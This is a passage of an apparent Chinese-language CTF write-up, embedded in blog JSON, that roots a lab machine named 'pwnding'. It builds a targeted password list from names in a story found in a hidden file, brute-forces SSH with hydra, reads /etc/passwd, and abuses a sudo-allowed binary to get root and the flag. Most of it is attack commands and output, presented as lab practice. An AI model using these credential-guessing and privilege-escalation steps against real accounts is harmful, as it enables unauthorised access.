src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849655.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250610175318786\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u627e\u5230\u4e86\u4e00\u5904\u53ef\u8bfb\u9690\u85cf\u6587\u4ef6\u540d\u4e3a\uff1a<code>\/var\/backups\/.secret\/.verysecret\/.noooooo\/note2.txt<\/code>\u770b\u4e00\u4e0b\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-bash\">The Compass and the Campfire\n\nDavid knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. &quot;Lost?&quot; Jake whispered, staring at the identical trees clawing at the twilight. David\u2019s calloused fingers brushed the cracked compass in his palm\u2014a relic from his father, its needle trembling like a moth. &quot;Not lost,&quot; he lied. &quot;Just\u2026 rerouting.&quot;\n\nJake\u2019s eyes narrowed, too sharp for comfort. &quot;Your compass is broken.&quot;\n\nA chuckle escaped David, brittle as dry leaves. &quot;Compasses don\u2019t break, bud. They\u2026 forget.&quot; He flipped it open, the glass fogged with age. &quot;See? North isn\u2019t where it should be. It\u2019s where it chooses to be tonight.&quot;\n\nThe boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake\u2019s fear dissolved into giggles. David watched, throat tight. He\u2019s still young enough to laugh at squirrels.\n\n&quot;Dad?&quot; Jake unzipped his jacket, revealing three granola bars and a glowstick. &quot;We\u2019ve got supplies. Let\u2019s build a fort.&quot;\n\nThey wove branches into a crooked shelter, Jake\u2019s hands steady where David\u2019s shook. When the first stars pierced the canopy, David confessed: &quot;Grandpa gave me this compass the day I got lost in the mall. Told me it\u2019d always point home.&quot;\n\nJake snapped the glowstick, bathing their fort in alien green. &quot;Does it work now?&quot;\n\nThe needle quivered, settling northwest. Toward the distant highway hum, not their cabin\u2019s woodsmoke. David closed the brass lid. &quot;Nope. 
But you do.&quot; He nodded at Jake\u2019s pocket\u2014where a crumpled trail map peeked out, dotted with the boy\u2019s doodled dinosaurs.\n\nDawn found them at the cabin\u2019s porch, guided by Jake\u2019s roars laughter and the squirrels he\u2019d named &quot;Sir Nibbles&quot;. The compass stayed in David\u2019s pocket, its secret safe: true north had shifted years ago, anyway\u2014from steel poles to a gap-toothed grin eating pancakes at 6 AM.<\/code><\/pre>\n<h3>\u793e\u5de5\u5bc6\u7801\u6587\u4ef6<\/h3>\n<p>\u53d1\u73b0\u8fd9\u7bc7\u540d\u4e3a\u300a\u6307\u5357\u9488\u4e0e\u7bdd\u706b\u300b\u7684\u77ed\u6587\u63d0\u5230\u4e86\u51e0\u4e2a\u70b9\u53ef\u4ee5\u7528\u6765\u8fdb\u884c\u793e\u5de5 \uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ sudo \/opt\/pwncat\/bin\/python3.9 \/usr\/bin\/cupp -i\n\ncupp.py!                 # Common\n      \\                     # User\n       \\   ,__,             # Passwords\n        \\  (oo)____         # Profiler\n           (__)    )\\   \n              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]\n                            [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don&#039;t know all the info, just hit enter when asked! ;)\n\n> First Name: David\n> Surname: \n> Nickname: \n> Birthdate (DDMMYYYY): \n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child&#039;s name: Jake\n> Child&#039;s nickname: \n> Child&#039;s birthdate (DDMMYYYY): \n\n> Pet&#039;s name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: \n> Do you want to add special chars at the end of words? Y\/[N]: \n> Do you want to add some random numbers at the end of words? Y\/[N]:\n> Leet mode? (i.e. 
leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to david.txt, counting 212 words.\n[+] Now load your pistolero with david.txt and shoot! Good luck!<\/code><\/pre>\n<p>\u522b\u7167\u6284\u6307\u4ee4\u54c8\uff0c\u8981\u6839\u636e\u81ea\u5df1\u73af\u5883\u4fee\u6539\u54e6\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<h3>\u7206\u7834\u5bc6\u7801<\/h3>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/home\/lamb$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nlamb:x:1001:1001:,,,:\/home\/lamb:\/bin\/bash<\/code><\/pre>\n<p>\u53d1\u73b0\u5c31\u8fd9\u51e0\u4e2a\u7528\u6237\uff0c\u8bf4\u660e\u793e\u5de5\u5bc6\u7801\u53ef\u80fd\u5c31\u662f\u672c\u7528\u6237\u7684\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ hydra -l lamb -P david.txt -f ssh:\/\/192.168.10.102:22                                                                             \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-10 06:22:44\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 212 login tries (l:1\/p:212), ~14 tries per task\n[DATA] attacking ssh:\/\/192.168.10.102:22\/\n[22][ssh] host: 192.168.10.102   login: lamb   password: ekaJ_2016\n[STATUS] attack finished for 192.168.10.102 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-06-10 
06:23:25<\/code><\/pre>\n<p>\u62ff\u5230\u4e86\u4e00\u4e2a\u5bc6\u7801<code>ekaJ_2016<\/code>\u5c1d\u8bd5\u770b\u770b\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/home\/lamb$ sudo -l \n[sudo] password for lamb: \nMatching Defaults entries for lamb on pwnding:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser lamb may run the following commands on pwnding:\n    (ALL : ALL) PASSWD: \/usr\/local\/bin\/getroot<\/code><\/pre>\n<h3>getroot\u83b7\u53d6\u51ed\u8bc1<\/h3>\n<p>\u53d1\u73b0\u679c\u7136\u6709sudo\u6743\u9650\uff0c\u4ece\u524d\u9762\u7684\u4fe1\u606f\u641c\u96c6\u5c31\u770b\u5230\u8fc7\u76f8\u5173\u4fe1\u606f\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fd0\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/tmp$ which ld\n\/usr\/bin\/ld\n(remote) lamb@pwnding:\/tmp$ ls -la \/usr\/bin\/ld\nlrwxrwxrwx 1 root root 19 Mar 21  2019 \/usr\/bin\/ld -&gt; x86_64-linux-gnu-ld\n(remote) lamb@pwnding:\/tmp$ gcc --help\nUsage: gcc [options] file...\nOptions:\n  -pass-exit-codes         Exit with highest error code from a phase.\n  --help                   Display this information.\n  --target-help            Display target specific command line options.\n  --help={common|optimizers|params|target|warnings|[^]{joined|separate|undocumented}}[,...].\n                           Display specific types of command line options.\n  (Use &#039;-v --help&#039; to display command line options of sub-processes).\n  --version                Display compiler version information.\n  -dumpspecs               Display all of the built in spec strings.\n  -dumpversion             Display the version of the compiler.\n  -dumpmachine             Display the compiler&#039;s target processor.\n  -print-search-dirs       Display the directories in the compiler&#039;s search path.\n  -print-libgcc-file-name  Display the name of the compiler&#039;s companion 
library.\n  -print-file-name=&lt;lib&gt;   Display the full path to library &lt;lib&gt;.\n  -print-prog-name=&lt;prog&gt;  Display the full path to compiler component &lt;prog&gt;.\n  -print-multiarch         Display the target&#039;s normalized GNU triplet, used as\n                           a component in the library path.\n  -print-multi-directory   Display the root directory for versions of libgcc.\n  -print-multi-lib         Display the mapping between command line options and\n                           multiple library search directories.\n  -print-multi-os-directory Display the relative path to OS libraries.\n  -print-sysroot           Display the target libraries directory.\n  -print-sysroot-headers-suffix Display the sysroot suffix used to find headers.\n  -Wa,&lt;options&gt;            Pass comma-separated &lt;options&gt; on to the assembler.\n  -Wp,&lt;options&gt;            Pass comma-separated &lt;options&gt; on to the preprocessor.\n  -Wl,&lt;options&gt;            Pass comma-separated &lt;options&gt; on to the linker.\n  -Xassembler &lt;arg&gt;        Pass &lt;arg&gt; on to the assembler.\n  -Xpreprocessor &lt;arg&gt;     Pass &lt;arg&gt; on to the preprocessor.\n  -Xlinker &lt;arg&gt;           Pass &lt;arg&gt; on to the linker.\n  -save-temps              Do not delete intermediate files.\n  -save-temps=&lt;arg&gt;        Do not delete intermediate files.\n  -no-canonical-prefixes   Do not canonicalize paths when building relative\n                           prefixes to other gcc components.\n  -pipe                    Use pipes rather than intermediate files.\n  -time                    Time the execution of each subprocess.\n  -specs=&lt;file&gt;            Override built-in specs with the contents of &lt;file&gt;.\n  -std=&lt;standard&gt;          Assume that the input sources are for &lt;standard&gt;.\n  --sysroot=&lt;directory&gt;    Use &lt;directory&gt; as the root directory for headers\n                           and libraries.\n  -B 
&lt;directory&gt;           Add &lt;directory&gt; to the compiler&#039;s search paths.\n  -v                       Display the programs invoked by the compiler.\n  -###                     Like -v but options quoted and commands not executed.\n  -E                       Preprocess only; do not compile, assemble or link.\n  -S                       Compile only; do not assemble or link.\n  -c                       Compile and assemble, but do not link.\n  -o &lt;file&gt;                Place the output into &lt;file&gt;.\n  -pie                     Create a dynamically linked position independent\n                           executable.\n  -shared                  Create a shared library.\n  -x &lt;language&gt;            Specify the language of the following input files.\n                           Permissible languages include: c c++ assembler none\n                           &#039;none&#039; means revert to the default behavior of\n                           guessing the language based on the file&#039;s extension.\n\nOptions starting with -g, -f, -m, -O, -W, or --param are automatically\n passed on to the various sub-processes invoked by gcc.  
In order to pass\n other options on to these processes the -W&lt;letter&gt; options must be used.\n\nFor bug reporting instructions, please see:\n&lt;file:\/\/\/usr\/share\/doc\/gcc-8\/README.Bugs&gt;.\n\n(remote) lamb@pwnding:\/tmp$ g++ key.c -o key -B \/usr\/bin\n(remote) lamb@pwnding:\/tmp$ file key\nkey: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=e089d5a319c7c73af28b06d082802e2b3c32072e, not stripped<\/code><\/pre>\n<p>The search path has to be given explicitly here (<code>-B \/usr\/bin<\/code>), otherwise <code>ld<\/code> is not found. Running the result does not produce a credential, which suggests the code is wrong, so try modifying it:<\/p>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/tmp$ while true; do sudo \/usr\/local\/bin\/getroot $(.\/key); sleep 1; done\n^C<\/code><\/pre>\n<p>Trying the earlier C code instead gives:<\/p>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/tmp$ gcc exp.c -o exp -B \/usr\/bin -lm  \n(remote) lamb@pwnding:\/tmp$ .\/exp\n60136\n(remote) lamb@pwnding:\/tmp$ while true; do sudo \/usr\/local\/bin\/getroot $(.\/exp); sleep 1; done\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0\n^C<\/code><\/pre>\n<p>That returns the credential, so the modified code had a problem while the original C code works. Try logging in with it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849656.png\" alt=\"image-20250610184751109\" style=\"zoom:50%;\" \/><\/p>\n<p>It works. All that is left is to read the flag:<\/p>\n<pre><code class=\"language-bash\">root@pwnding:~# cat ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt\nflag{46511d58f2ae11ef9ea3000c29094b2d}\nroot@pwnding:~# cat monitor.sh\n#!\/bin\/bash\n\n# Log file configuration\nLOG_FILE=&quot;\/var\/log\/server_monitor.log&quot;\nMAX_LOG_SIZE=1048576 \n\n# Truncate the log file if it has grown too large\nif [ -f &quot;$LOG_FILE&quot; ] &amp;&amp; [ $(stat -c%s &quot;$LOG_FILE&quot;) -gt $MAX_LOG_SIZE ]; then\n    &gt; &quot;$LOG_FILE&quot;\nfi\n\nlog() {\n    echo &quot;[$(date &#039;+%Y-%m-%d %T&#039;)] $1&quot; | tee -a &quot;$LOG_FILE&quot;\n}\n\n# Check whether an old instance is already running\nif [ -f &quot;\/tmp\/server_monitor.lock&quot; ]; then\n    log &quot;\u68c0\u6d4b\u5230\u5df2\u6709\u76d1\u63a7\u8fdb\u7a0b\u5728\u8fd0\u884c\uff0c\u9000\u51fa\u4e2d...&quot;\n    exit 1\nfi\n\n# Create the lock file\ntrap &#039;rm -f \/tmp\/server_monitor.lock; exit 0&#039; INT TERM EXIT\necho $$ &gt; \/tmp\/server_monitor.lock\n\n# Main monitoring loop\nwhile true; do\n    if ! 
pgrep -x &quot;server&quot; &gt; \/dev\/null; then\n        log &quot;\u68c0\u6d4b\u5230\u670d\u52a1\u672a\u8fd0\u884c\uff0c\u5c1d\u8bd5\u542f\u52a8...&quot;\n\n        # Switch user and start the service\n        if sudo -u lamb -i \/opt\/server 2&gt;&gt; &quot;$LOG_FILE&quot;; then\n            log &quot;\u670d\u52a1\u542f\u52a8\u6210\u529f&quot;\n        else\n            log &quot;\u670d\u52a1\u542f\u52a8\u5931\u8d25\uff01\u9519\u8bef\u7801\uff1a$?&quot;\n            # Rate-limit restarts after a failure\n            sleep 1\n        fi\n    fi\n    sleep 1\ndone<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>easypwn Information gathering Port scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn] \u2514\u2500$ r [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-847","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/847","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=847"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/847\/revisions"}],"predecessor-version":[{"id":848,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/847\/revisions\/848"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=847"}],"wp:term":[
{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=847"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=847"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}